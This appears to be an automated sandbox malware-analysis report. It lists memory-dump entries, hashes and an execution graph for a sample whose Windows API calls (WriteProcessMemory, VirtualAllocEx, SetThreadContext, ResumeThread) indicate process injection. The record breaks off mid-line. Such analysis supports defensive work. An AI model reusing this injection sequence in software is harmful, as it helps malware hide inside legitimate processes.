                              • Instruction Fuzzy Hash: 8641F2B0C00719CBDF25DFA9C884BDDBBB6BF49304F20816AD408AB255DB756946CF90
                              APIs
                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F969C0
                              Memory Dump Source
                              • Source File: 0000000A.00000002.2116885951.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_6f90000_HxQXdrrQ.jbxd
                              Similarity
                              • API ID: MemoryProcessWrite
                              • String ID:
                              • API String ID: 3559483778-0
                              • Opcode ID: fea165436675405a94e0df1a7b5e9bfcc4947c3fa828c467d6d9f834bfe9c256
                              • Instruction ID: 88f549542d4672f480b35279dba6b70ff27d951eeaffd97cdf90492ff6a1c022
                              • Opcode Fuzzy Hash: fea165436675405a94e0df1a7b5e9bfcc4947c3fa828c467d6d9f834bfe9c256
                              • Instruction Fuzzy Hash: 5B2124B1D003599FDB10DFAAC885BEEBBF5FF48310F10842AE959A7250D7789954CBA0
                              APIs
                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F969C0
                              Memory Dump Source
                              • Source File: 0000000A.00000002.2116885951.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_6f90000_HxQXdrrQ.jbxd
                              Similarity
                              • API ID: MemoryProcessWrite
                              • String ID:
                              • API String ID: 3559483778-0
                              • Opcode ID: a5795d55cff2ccc920b9af54edd2e943945e150462a2ce3dfc95f7f51cc87fe1
                              • Instruction ID: cbc54c9a7dd9ce50829a6be73166898ad1c14124299fad6a54b18bac0761c394
                              • Opcode Fuzzy Hash: a5795d55cff2ccc920b9af54edd2e943945e150462a2ce3dfc95f7f51cc87fe1
                              • Instruction Fuzzy Hash: 032124B1D003499FDB10DFAAC885BEEBBF5FF48310F10842AE959A7250C7789944CBA0
                              APIs
                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F96AA0
                              Memory Dump Source
                              • Source File: 0000000A.00000002.2116885951.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_6f90000_HxQXdrrQ.jbxd
                              Similarity
                              • API ID: MemoryProcessRead
                              • String ID:
                              • API String ID: 1726664587-0
                              • Opcode ID: 5cc87a34ab0376809381b576119ca0343efce454156f79a87664242abf934763
                              • Instruction ID: e3adf086c96bd5b5edfc39881816a7b1ebe22068ddf628873ecead990ab11252
                              • Opcode Fuzzy Hash: 5cc87a34ab0376809381b576119ca0343efce454156f79a87664242abf934763
                              • Instruction Fuzzy Hash: 8C2148B1C003599FDB10DFAAC980AEEFBF5FF48310F10842AE919A7250C7389944CBA0
                              APIs
                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F963DE
                              Memory Dump Source
                              • Source File: 0000000A.00000002.2116885951.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_6f90000_HxQXdrrQ.jbxd
                              Similarity
                              • API ID: ContextThreadWow64
                              • String ID:
                              • API String ID: 983334009-0
                              • Opcode ID: c4f8ad059bcd872959bdeca0661db0da3c4ba3134d3c1abe342cab9def397746
                              • Instruction ID: c06755c2dd27d75f52b087c0b74ccb02efdf4808cd46abf6579381ba563ce798
                              • Opcode Fuzzy Hash: c4f8ad059bcd872959bdeca0661db0da3c4ba3134d3c1abe342cab9def397746
                              • Instruction Fuzzy Hash: 392125B1D002098FEB10DFAAC485BAEBBF4EF48314F108429E559A7241CB78A945CBA0
                              APIs
                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00D9D66E,?,?,?,?,?), ref: 00D9D72F
                              Memory Dump Source
                              • Source File: 0000000A.00000002.2109322857.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_d90000_HxQXdrrQ.jbxd
                              Similarity
                              • API ID: DuplicateHandle
                              • String ID:
                              • API String ID: 3793708945-0
                              • Opcode ID: 610ae58b890a1d4b739a60d0e4fb948e305cd3d984583e8504ef3b33ed0777a6
                              • Instruction ID: e1d3b8aa791a5e0bf3685c5e41996ba44027a80865f10801ec9e69e371074616
                              • Opcode Fuzzy Hash: 610ae58b890a1d4b739a60d0e4fb948e305cd3d984583e8504ef3b33ed0777a6
                              • Instruction Fuzzy Hash: 5E21E5B59002489FDB10DF9AD584AEEFBF9EB48310F14801AE919A7350D379A944CFA4
                              APIs
                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F96AA0
                              Memory Dump Source
                              • Source File: 0000000A.00000002.2116885951.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_6f90000_HxQXdrrQ.jbxd
                              Similarity
                              • API ID: MemoryProcessRead
                              • String ID:
                              • API String ID: 1726664587-0
                              • Opcode ID: a2a725fddc992358d0bfaf014a8057b2ef7ce04276cce47908f13e0afa96b25f
                              • Instruction ID: 33c497d66b29507edd8d84f39490e25220dba4164090825d0501a93591e91d75
                              • Opcode Fuzzy Hash: a2a725fddc992358d0bfaf014a8057b2ef7ce04276cce47908f13e0afa96b25f
                              • Instruction Fuzzy Hash: 062125B1C002599FDB10DFAAC980AEEFBF5FF48310F10842AE919A7250C7389944CBA0
                              APIs
                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F963DE
                              Memory Dump Source
                              • Source File: 0000000A.00000002.2116885951.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_6f90000_HxQXdrrQ.jbxd
                              Similarity
                              • API ID: ContextThreadWow64
                              • String ID:
                              • API String ID: 983334009-0
                              • Opcode ID: 8c1f44917de89e54155f732446ab866987be2a8ab52b6ede6a7a94f4852cdb45
                              • Instruction ID: 80519161d625c055d7f0ac115c076f51a5a68e55da462b1ebe55e5c3cde0a078
                              • Opcode Fuzzy Hash: 8c1f44917de89e54155f732446ab866987be2a8ab52b6ede6a7a94f4852cdb45
                              • Instruction Fuzzy Hash: 032115B1D002098FEB10DFAAC485BEEBBF4EF48314F14842AD559A7341CB78A945CFA1
                              APIs
                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00D9D66E,?,?,?,?,?), ref: 00D9D72F
                              Memory Dump Source
                              • Source File: 0000000A.00000002.2109322857.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_d90000_HxQXdrrQ.jbxd
                              Similarity
                              • API ID: DuplicateHandle
                              • String ID:
                              • API String ID: 3793708945-0
                              • Opcode ID: a973ab96f55048436cf1aeaea8eeb8e285c72dd52447335ca9bc45085977b065
                              • Instruction ID: 2e7ca04f5fa917ddab19b84e761a86fe84c3596d0fcd835be8bcd0ef2e8c3a2a
                              • Opcode Fuzzy Hash: a973ab96f55048436cf1aeaea8eeb8e285c72dd52447335ca9bc45085977b065
                              • Instruction Fuzzy Hash: 3821E4B59002489FDB10CFA9D584ADEFBF5FB48310F14801AE918A3350D378A944CF64
                              APIs
                              • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,071F2E6A,?,?,?,?,?), ref: 071F2F0F
                              Memory Dump Source
                              • Source File: 0000000A.00000002.2117086589.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_71f0000_HxQXdrrQ.jbxd
                              Similarity
                              • API ID: CreateFromIconResource
                              • String ID:
                              • API String ID: 3668623891-0
                              • Opcode ID: 52733fb7fae65966b61a3f8296bea2ff9ce49afd395c0ac1313d66dcd2c49f51
                              • Instruction ID: 5e3af9885c5d4ec443c9fe3d10989f89f5a4c99517a74a3404849bcd98fe281d
                              • Opcode Fuzzy Hash: 52733fb7fae65966b61a3f8296bea2ff9ce49afd395c0ac1313d66dcd2c49f51
                              • Instruction Fuzzy Hash: 9B1137B58002499FDB10DF9AC844BEEBFF8FF49310F14841AEA14A7250C379A954DFA4
                              APIs
                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F968DE
                              Memory Dump Source
                              • Source File: 0000000A.00000002.2116885951.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_6f90000_HxQXdrrQ.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: 826fb1fd3616bd6ea0b16064b03d00cfe3438e13ca7b4903377179396f29b355
                              • Instruction ID: 0f82761c00ff6f450ac2f9c600bbecf9a6eb153d67cc191b7376a7d1df241005
                              • Opcode Fuzzy Hash: 826fb1fd3616bd6ea0b16064b03d00cfe3438e13ca7b4903377179396f29b355
                              • Instruction Fuzzy Hash: 5E1117719003499FDB10DFAAC845ADEBBF5EF48314F248419E519A7250CB75A554CBA0
                              APIs
                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F968DE
                              Memory Dump Source
                              • Source File: 0000000A.00000002.2116885951.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_6f90000_HxQXdrrQ.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: 0e3424c1589b3ddd8572728fcc2667d47913de35e37c62e419a866827d989b38
                              • Instruction ID: f646d6e574cd81fa468e559567217754b084494fe7355fa42a4a482248a42509
                              • Opcode Fuzzy Hash: 0e3424c1589b3ddd8572728fcc2667d47913de35e37c62e419a866827d989b38
                              • Instruction Fuzzy Hash: 37113771C002499FDB10DFAAC844AEEFFF5EF48314F208419E519A7250CB79A544CFA0
                              APIs
                              Memory Dump Source
                              • Source File: 0000000A.00000002.2116885951.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_6f90000_HxQXdrrQ.jbxd
                              Similarity
                              • API ID: ResumeThread
                              • String ID:
                              • API String ID: 947044025-0
                              • Opcode ID: e58139d173603d4b7b4384329983a061ad9789383e6d03f40ceb7799940a5058
                              • Instruction ID: 5db4be207a5e64c20dccc3d57d807aa8ec314735696459fefdcf4ee01801d07d
                              • Opcode Fuzzy Hash: e58139d173603d4b7b4384329983a061ad9789383e6d03f40ceb7799940a5058
                              • Instruction Fuzzy Hash: 531119B1D003498BDB20DFAAC44579EFBF5EF49314F208419D519A7250CB79A545CBA0
                              APIs
                              Memory Dump Source
                              • Source File: 0000000A.00000002.2116885951.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_6f90000_HxQXdrrQ.jbxd
                              Similarity
                              • API ID: ResumeThread
                              • String ID:
                              • API String ID: 947044025-0
                              • Opcode ID: f80ba84e2e2869a67a50e1bfe4b3debc15a5b1d765199804d23c1158c9857048
                              • Instruction ID: ef0579ce1bb24f87143bb4fa3f676e4d6963a839b60dab531e969ea263857822
                              • Opcode Fuzzy Hash: f80ba84e2e2869a67a50e1bfe4b3debc15a5b1d765199804d23c1158c9857048
                              • Instruction Fuzzy Hash: 311128B1D002488BDB20DFAAC445BEEFBF9EF88314F208419D519A7250CB79A544CBA0
                              APIs
                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 06F9A315
                              Memory Dump Source
                              • Source File: 0000000A.00000002.2116885951.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_6f90000_HxQXdrrQ.jbxd
                              Similarity
                              • API ID: MessagePost
                              • String ID:
                              • API String ID: 410705778-0
                              • Opcode ID: 8e6e74ce453d57147bf6dc21f9c239642e688382f51fe801f561d329e6f8eaf7
                              • Instruction ID: 2a040d1db9b1dc0df400354600867562ce80313d15504fb044e6a404a5ceded2
                              • Opcode Fuzzy Hash: 8e6e74ce453d57147bf6dc21f9c239642e688382f51fe801f561d329e6f8eaf7
                              • Instruction Fuzzy Hash: 211106B58003489FDB10DF9AC449BDEFBF8EB48314F108419E918A7610D375A944CFA1
                              APIs
                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00D9B41E
                              Memory Dump Source
                              • Source File: 0000000A.00000002.2109322857.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_d90000_HxQXdrrQ.jbxd
                              Similarity
                              • API ID: HandleModule
                              • String ID:
                              • API String ID: 4139908857-0
                              • Opcode ID: 52ab4a0850d7a83b08cc82d0d9db302a060d2eeaaec68e160d4397fadf77ceef
                              • Instruction ID: 74194137656c164295d484d854c2923120594e8a0712e1109e38f8c307b2aceb
                              • Opcode Fuzzy Hash: 52ab4a0850d7a83b08cc82d0d9db302a060d2eeaaec68e160d4397fadf77ceef
                              • Instruction Fuzzy Hash: 171110B5C002498FCB10DF9AD544ADEFBF8EF88328F14841AD419A7710C379A545CFA1
                              APIs
                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 06F9A315
                              Memory Dump Source
                              • Source File: 0000000A.00000002.2116885951.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_6f90000_HxQXdrrQ.jbxd
                              Similarity
                              • API ID: MessagePost
                              • String ID:
                              • API String ID: 410705778-0
                              • Opcode ID: 7c16d42bdac1c2c3aa3d60d996faf1b7d15d27768aad2e5d6fc2bb195bbe94a6
                              • Instruction ID: 4f45cac7792664d7d9984d7f5cdc52228a7370dba3e99fce05d2ced4cc95d050
                              • Opcode Fuzzy Hash: 7c16d42bdac1c2c3aa3d60d996faf1b7d15d27768aad2e5d6fc2bb195bbe94a6
                              • Instruction Fuzzy Hash: 1511F5B58003499FDB10DF99C885BDEFBF8EB48314F208419D958A7650C379A944CFA1
                              Memory Dump Source
                              • Source File: 0000000A.00000002.2108575004.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_a8d000_HxQXdrrQ.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 13769ba24ac708606971ac96c516d00a30d97eabe18ba2965f09ae61a95bb49e
                              • Instruction ID: 324f2deb859a3c103e0a3e14ad637344879f9f54d5caa4186a9eacde4bb4ab4b
                              • Opcode Fuzzy Hash: 13769ba24ac708606971ac96c516d00a30d97eabe18ba2965f09ae61a95bb49e
                              • Instruction Fuzzy Hash: 3A212571500240EFCB09EF14D9C0F26BF65FB98318F20C56AE9090B296C33AD816DBA2
                              Memory Dump Source
                              • Source File: 0000000A.00000002.2108575004.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_a8d000_HxQXdrrQ.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fdc9964e749bd46aa2f555dbcf3a9ece4d1b020a75cee9988cc6f6d290cd2061
                              • Instruction ID: a0a91e1936021ab255eebf18cc05a22ab4165bc4cb4c99122db9b905824ea1c4
                              • Opcode Fuzzy Hash: fdc9964e749bd46aa2f555dbcf3a9ece4d1b020a75cee9988cc6f6d290cd2061
                              • Instruction Fuzzy Hash: 18210775504204EFDB05EF14D9C0F26BF65FB98324F24C569E9090F296C33AE856DBA2
                              Memory Dump Source
                              • Source File: 0000000A.00000002.2108630517.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_a9d000_HxQXdrrQ.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 59756a6e05faa9434343fda7011df9d2f686d341013fed3cda4780f15db25455
                              • Instruction ID: b915aa4e678e6154dbcf265b8b10d36e1e9572e9b4a65f3a52af690b6f0e38eb
                              • Opcode Fuzzy Hash: 59756a6e05faa9434343fda7011df9d2f686d341013fed3cda4780f15db25455
                              • Instruction Fuzzy Hash: 1E21F271604204DFDF14DF24D984B26BFA5FB88314F20C569D94A4B296C33AD887CA61
                              Memory Dump Source
                              • Source File: 0000000A.00000002.2108630517.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_a9d000_HxQXdrrQ.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 878896f630e6495125aeaf7def8781c6502efe0cb0b001a908c54ece22de3df6
                              • Instruction ID: 37690eaf0f5a302ba787f3349f1b142f086543cf343d1a27583298892da28059
                              • Opcode Fuzzy Hash: 878896f630e6495125aeaf7def8781c6502efe0cb0b001a908c54ece22de3df6
                              • Instruction Fuzzy Hash: EB210475604204EFDF05DF24D9C0F26BBA5FB98314F20CA6DE9094F296C33AD886CA61
                              Memory Dump Source
                              • Source File: 0000000A.00000002.2108630517.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_a9d000_HxQXdrrQ.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1211759a5e7aa14f33aff2f6042116e44c9be5f5922f489c0b495c39006726f2
                              • Instruction ID: 93f53482ee3a57d3fb8b8fab1e8b0f2e9071e82d3651d6b8cbafd1463964816d
                              • Opcode Fuzzy Hash: 1211759a5e7aa14f33aff2f6042116e44c9be5f5922f489c0b495c39006726f2
                              • Instruction Fuzzy Hash: E221C6755093808FDB02CF24D594715BFB1FB46314F28C5DAD8498B297C33AD84ACB62
                              Memory Dump Source
                              • Source File: 0000000A.00000002.2108575004.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_a8d000_HxQXdrrQ.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                              • Instruction ID: 322aff09762c0e8b3f453f798eda80b040bf8549613cebed63eac7b491538f93
                              • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                              • Instruction Fuzzy Hash: 94112672404280CFCB06DF10D5C4B16BF71FB98314F24C6AAD8490B656C336D85ACBA2
                              Memory Dump Source
                              • Source File: 0000000A.00000002.2108575004.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_a8d000_HxQXdrrQ.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                              • Instruction ID: 24685cd29012bcc18f4017f4ca12a22d02e75930399bbaf526ad3387910b05cf
                              • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                              • Instruction Fuzzy Hash: D7112672404240DFCB02DF00D5C4B16BF71FB94324F24C6A9DD090B256C33AE85ACBA2
                              Memory Dump Source
                              • Source File: 0000000A.00000002.2108630517.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_a9d000_HxQXdrrQ.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                              • Instruction ID: 6ba14f4217273cfdb2f3254bdf6b9fe0d613e97e940ea8d0151b5c1a8ca95ce1
                              • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                              • Instruction Fuzzy Hash: 0E118B75604280DFDB16CF14D5C4B55BBA1FB84314F24C6A9D8494B696C33AD84ACB62
                              Memory Dump Source
                              • Source File: 0000000A.00000002.2108575004.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_a8d000_HxQXdrrQ.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5b746a074daab520f9c89d339ed637f4ceb088f93f5dbc67ddc33f06e9005c4c
                              • Instruction ID: 3e1053e1c926d40a4537a74a7bfa55a603cc305eeda3cb923e0b9ccf89cae196
                              • Opcode Fuzzy Hash: 5b746a074daab520f9c89d339ed637f4ceb088f93f5dbc67ddc33f06e9005c4c
                              • Instruction Fuzzy Hash: C601A7710043449AE720AF55CD84B66BFACEF45364F18C52AED090A2D6D6799841CB75
                              Memory Dump Source
                              • Source File: 0000000A.00000002.2108575004.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_a8d000_HxQXdrrQ.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1393b351980418aae5b4ab62d2c6252cca4a4e31ba7de743f42114413ceba17d
                              • Instruction ID: 3e08094933052e715e43c74390afd03477af09c102c99842618c6371b6646db2
                              • Opcode Fuzzy Hash: 1393b351980418aae5b4ab62d2c6252cca4a4e31ba7de743f42114413ceba17d
                              • Instruction Fuzzy Hash: 03F06D71404344AEE7209F1AC988B66FFA8EF96734F18C45AED484E296C2799C44CBB1

                              Execution Graph

                              Execution Coverage:3%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:1.3%
                              Total number of Nodes:302
                              Total number of Limit Nodes:13
                              execution_graph 8943 408952 8964 40823f 8943->8964 8946 408960 8948 4056bf 2 API calls 8946->8948 8949 40896a 8948->8949 8992 408862 8949->8992 8951 4089c4 8952 413aca 4 API calls 8951->8952 8953 4089d4 8952->8953 8955 405695 2 API calls 8953->8955 8954 408975 8954->8951 9000 4087d6 8954->9000 8957 4089df 8955->8957 8962 402bab 2 API calls 8963 40899d 8962->8963 8963->8951 8963->8962 8965 40824d 8964->8965 8966 40831b 8965->8966 8967 4031e5 3 API calls 8965->8967 8966->8946 8980 4083bb 8966->8980 8968 40826d 8967->8968 8969 4031e5 3 API calls 8968->8969 8970 408289 8969->8970 8971 4031e5 3 API calls 8970->8971 8972 4082a5 8971->8972 8973 4031e5 3 API calls 8972->8973 8974 4082c1 8973->8974 8975 4031e5 3 API calls 8974->8975 8976 4082e2 8975->8976 8977 4031e5 3 API calls 8976->8977 8978 4082ff 8977->8978 8979 4031e5 3 API calls 8978->8979 8979->8966 9028 408363 8980->9028 8983 4084ab 8983->8946 8984 4056bf 2 API calls 8989 4083f4 8984->8989 8985 408492 8986 413aca 4 API calls 8985->8986 8987 4084a0 8986->8987 8988 405695 2 API calls 8987->8988 8988->8983 8989->8985 9031 40815d 8989->9031 9046 40805d 8989->9046 9061 404b8f 8992->9061 8994 40887e 8995 4031e5 3 API calls 8994->8995 8996 40893e 8994->8996 8998 408946 8994->8998 8999 402b7c 2 API calls 8994->8999 8995->8994 9064 404a39 8996->9064 8998->8954 8999->8994 9001 402b7c 2 API calls 9000->9001 9002 4087e7 9001->9002 9003 4031e5 3 API calls 9002->9003 9005 40885a 9002->9005 9007 408802 9003->9007 9004 402bab 2 API calls 9004->9005 9012 408749 9005->9012 9008 40884d 9007->9008 9011 408853 9007->9011 9073 408522 9007->9073 9077 4084b4 9007->9077 9080 4084d4 9008->9080 9011->9004 9013 404b8f 3 API calls 9012->9013 9014 408765 9013->9014 9015 4031e5 3 API calls 9014->9015 9016 408522 3 API calls 9014->9016 9017 4087c7 9014->9017 9019 4087cf 9014->9019 9015->9014 9016->9014 9018 404a39 4 API calls 9017->9018 9018->9019 9020 4085d1 9019->9020 9021 4086c2 9020->9021 9024 4085e9 9020->9024 9021->8963 9023 402bab 2 API calls 9023->9024 9024->9021 9024->9023 9025 4031e5 3 API calls 9024->9025 9086 4089e6 9024->9086 9105 4086c9 9024->9105 9109 4036a3 9024->9109 9025->9024 9029 4031e5 3 API calls 9028->9029 9030 408386 9029->9030 9030->8983 9030->8984 9032 40816f 9031->9032 9033 4081b6 9032->9033 9034 4081fd 9032->9034 9045 4081ef 9032->9045 9036 405872 4 API calls 9033->9036 9035 405872 4 API calls 9034->9035 9037 408213 9035->9037 9038 4081cf 9036->9038 9039 405872 4 API calls 9037->9039 9040 405872 4 API calls 9038->9040 9041 408222 9039->9041 9042 4081df 9040->9042 9043 405872 4 API calls 9041->9043 9044 405872 4 API calls 9042->9044 9043->9045 9044->9045 9045->8989 9047 40808c 9046->9047 9048 4080d2 9047->9048 9049 408119 9047->9049 9060 40810b 9047->9060 9050 405872 4 API calls 9048->9050 9051 405872 4 API calls 9049->9051 9052 4080eb 9050->9052 9053 40812f 9051->9053 9054 405872 4 API calls 9052->9054 9055 405872 4 API calls 9053->9055 9056 4080fb 9054->9056 9057 40813e 9055->9057 9058 405872 4 API calls 9056->9058 9059 405872 4 API calls 9057->9059 9058->9060 9059->9060 9060->8989 9067 404a19 9061->9067 9070 4049ff 9064->9070 9066 404a44 9066->8998 9068 4031e5 3 API calls 9067->9068 9069 404a2c 9068->9069 9069->8994 9071 4031e5 3 API calls 9070->9071 9072 404a12 RegCloseKey 9071->9072 9072->9066 9074 408534 9073->9074 9076 4085af 9074->9076 9083 4084ee 9074->9083 9076->9007 9078 4031e5 3 API calls 9077->9078 9079 4084c7 9078->9079 9079->9007 9081 4031e5 3 API calls 9080->9081 9082 4084e7 9081->9082 9082->9011 9084 4031e5 3 API calls 9083->9084 9085 408501 9084->9085 9085->9076 9087 4031e5 3 API calls 9086->9087 9088 408a06 9087->9088 9089 4031e5 3 API calls 9088->9089 9093 408b21 9088->9093 9092 408a32 9089->9092 9090 408b17 9121 403649 9090->9121 9092->9090 9112 403666 9092->9112 9093->9024 9096 408b0e 9118 40362f 9096->9118 9098 4031e5 3 API calls 9099 408a88 9098->9099 9099->9096 9100 4031e5 3 API calls 9099->9100 9101 408ac4 9100->9101 9102 405b6f 5 API calls 9101->9102 9103 408aff 9102->9103 9103->9096 9115 408508 9103->9115 9106 4086e2 9105->9106 9108 408744 9105->9108 9107 405872 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 9106->9107 9106->9108 9107->9106 9108->9024 9110 4031e5 3 API calls 9109->9110 9111 4036b5 9110->9111 9111->9024 9113 4031e5 3 API calls 9112->9113 9114 403679 9113->9114 9114->9096 9114->9098 9116 4031e5 3 API calls 9115->9116 9117 40851b 9116->9117 9117->9096 9119 4031e5 3 API calls 9118->9119 9120 403642 9119->9120 9120->9090 9122 4031e5 3 API calls 9121->9122 9123 40365c 9122->9123 9123->9093 8101 402c1f 8102 4031e5 3 API calls 8101->8102 8103 402c31 LoadLibraryW 8102->8103 8060 405924 8063 4031e5 8060->8063 8064 4031f3 8063->8064 8065 403236 8063->8065 8064->8065 8067 403208 8064->8067 8074 4030a5 8065->8074 8080 403263 8067->8080 8069 4031e5 3 API calls 8071 403258 8069->8071 8070 40320d 8070->8071 8072 4030a5 3 API calls 8070->8072 8073 403224 8072->8073 8073->8069 8073->8071 8086 402ca4 8074->8086 8076 4030b0 8077 4030b5 8076->8077 8090 4030c4 8076->8090 8077->8073 8081 40326d 8080->8081 8085 4032b7 8081->8085 8099 402b7c GetProcessHeap HeapAlloc 8081->8099 8083 40328c 8084 402b7c 2 API calls 8083->8084 8084->8085 8085->8070 8087 403079 8086->8087 8089 40307c 8087->8089 8094 40317b GetPEB 8087->8094 8089->8076 8091 4030eb 8090->8091 8093 4030c0 8091->8093 8096 402c03 8091->8096 8093->8073 8095 40319b 8094->8095 8095->8089 8097 4031e5 3 API calls 8096->8097 8098 402c15 8097->8098 8098->8093 8100 402b98 8099->8100 8100->8083 8104 4139de 8113 413855 8104->8113 8106 4139f1 8107 413838 GetProcessHeap HeapAlloc GetPEB 8106->8107 8110 4139f7 8107->8110 8108 413866 21 API calls 8109 413a2d 8108->8109 8111 413b81 GetProcessHeap HeapAlloc GetPEB ExitProcess 8109->8111 8110->8108 8112 413a34 8111->8112 8114 4031e5 3 API calls 8113->8114 8115 413864 8114->8115 8115->8115 8059 404df3 WSAStartup 10666 40f980 10681 413c87 10666->10681 10668 40fa19 10669 40fa08 10670 402bab 2 API calls 10669->10670 10670->10668 10671 40f993 10671->10668 10671->10669 10672 40429b 3 API calls 10671->10672 10673 40f9ca 10672->10673 10703 4060bd 10673->10703 10678 412093 6 API calls 10679 40f9f6 10678->10679 10680 412093 6 API calls 